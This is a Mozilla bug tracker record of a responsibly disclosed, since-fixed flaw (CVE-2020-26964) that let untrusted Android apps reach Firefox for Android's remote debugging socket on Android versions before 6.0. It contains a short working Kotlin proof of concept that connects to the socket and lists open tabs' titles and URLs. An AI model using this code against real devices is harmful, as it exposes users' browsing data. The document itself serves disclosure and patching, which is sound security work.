Closed Bug 1658865 (CVE-2020-26964) Opened 5 years ago Closed 4 years ago

Untrusted apps can connect Fenix's remote debugging socket on older Android devices

Categories

(Fenix :: General, task)

Product:
Fenix
Component:
General
Platform:
Unspecified
Android
Type:
task

Tracking

(firefox82 wontfix, firefox83 fixed, firefox84 fixed)

Status:
RESOLVED FIXED
Tracking Flags:
Tracking Status
firefox82 --- wontfix
firefox83 --- fixed
firefox84 --- fixed

People

(Reporter: sdna.muneaki.nishimura, Assigned: mcarare)

References

Details

(Keywords: reporter-external, sec-low, Whiteboard: [reporter-external] [client-bounty-form] [verif?][adv-main83+])

Attachments

(2 files, 1 obsolete file)

remote_debug.gif
1.28 MB, image/gif
Details
advisory.txt
734 bytes, text/plain
Details
Attached image remote_debug.gif

I'm not sure whether this is a security bug or by design (i.e., already considered & accepted risk), but Fenix's remote debugging socket can be connected from untrusted apps if Android OS version is older than 6.

When user enables "Remote debbuging via USB", Fenix creates an unix domain socket that name is firefox-debugger-socket. That socket is not explicitly protected by Fenix itself but it's not connectable from untrusted apps because unix sockets are banned by Android's SELinux policy (below).
https://android.googlesource.com/platform/external/sepolicy/+/57531cacb40682be4b1189c721fd1e7f25bf3786/untrusted_app.te#137

But the SELinux policy was enforced from Android version 6.0 (Marshmallow).
Android older than 6.0 (such as 5.1 Lollipop) allows to use them without any permissions.

As you know Android 5.1 is very old, but still they has about 8% share. Also Mozilla website clearly mentions that Firefox is compatible with Android 4.1 or above devices (below).
https://support.mozilla.org/en-US/kb/will-firefox-work-my-mobile-device#mobile::m79

If so, in order to protect the debugger socket, there should be some protections in Fenix itself, for example, hiding "Remote debbuging via USB" button on old devices.

The following Kotlin code can reproduce this issue on Nexus 6 emulator with Android 5.1 stock image. See also attached animation gif for the demo.

var socket = LocalSocket()
var addr = LocalSocketAddress("org.mozilla.fenix/firefox-debugger-socket")
socket.connect(addr)
Toast.makeText(applicationContext, "Connected", Toast.LENGTH_SHORT).show()
var reader: Scanner = Scanner(socket.getInputStream())
var writer: OutputStream = socket.getOutputStream()
reader.nextLine()

// List tab request
var req = "48:{\"type\":\"listTabs\",\"favicons\":false,\"to\":\"root\"}"
writer.write((req + '\n').toByteArray(Charset.defaultCharset()))

// Parse response
var resp = reader.nextLine().toString()
var index = resp.indexOf("{", 0)
var tabs = JSONObject(resp.substring(index)).getJSONArray("tabs")

// Show tab info
for(i in 0 until tabs.length()) {
    var tab = tabs.getJSONObject(i)
    var outerWindowID = tab.getInt("outerWindowID")
    var title = tab.getString("title")
    var url = tab.getString("url")
    var output = "#${i+1} Window ID: ${outerWindowID}\nTitle: ${title}\n URL: ${url}"
    Toast.makeText(applicationContext, output, Toast.LENGTH_LONG).show()
}
socket.close()
Flags: sec-bounty?

Thank you for providing a demo!

I think this is sec-low. I could be convinced that this is sec-moderate if the affected Android versions weren't so old. It still requires the user to run a bad app.

Group: firefox-core-security → mobile-core-security
Component: Security → Security: Android
Keywords: sec-low
Product: Firefox → Fenix
Flags: sec-bounty? → sec-bounty-

Stefan, what's our support for Android 5.1. Is this here a WONTFIX?

Flags: needinfo?(sarentz)

We still support Android 5.0 and 5.1. It is not 8% of users it is under 4%. We should disable this for Android 5.0 and 5.1. Should be able to stop this by disabling the USB debugging option in the affected Android versions. We should document it at https://developer.mozilla.org/en-US/docs/Tools/about:debugging#Connecting_to_a_remote_device that Android 5.0 and 5.1 do not have this feature.

Flags: needinfo?(sarentz)

A patch landed on mater in the Fenix repo that will disable USB debugging for Android < 6.0 devices:
https://github.com/mozilla-mobile/fenix/commit/3cb2c83980a3fd799ddeef2d3f0745a17f73bef4

Status: NEW → RESOLVED
Closed: 4 years ago
status-firefox82: --- → affected
status-firefox83: --- → affected
status-firefox84: --- → fixed
Resolution: --- → FIXED

Seems like this would be safe to uplift to 83?

Assignee: nobody → mcarare
Group: mobile-core-security → core-security-release
status-firefox82: affectedwontfix
Flags: needinfo?(s.kaspari)

Yeah lets uplift.

Patch landed on the 83 release branch and should get out with 83 Beta 3 later this week.

status-firefox83: affectedfixed
Whiteboard: [reporter-external] [client-bounty-form] [verif?] → [reporter-external] [client-bounty-form] [verif?][adv-main83+]
Attached file advisory.txt (obsolete) —
Attached file advisory.txt
Attachment #9186987 - Attachment is obsolete: true
Alias: CVE-2020-26964
Group: core-security-release
Flags: sec-bounty-hof+
Component: Security: Android → General
OS: Unspecified → Android
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: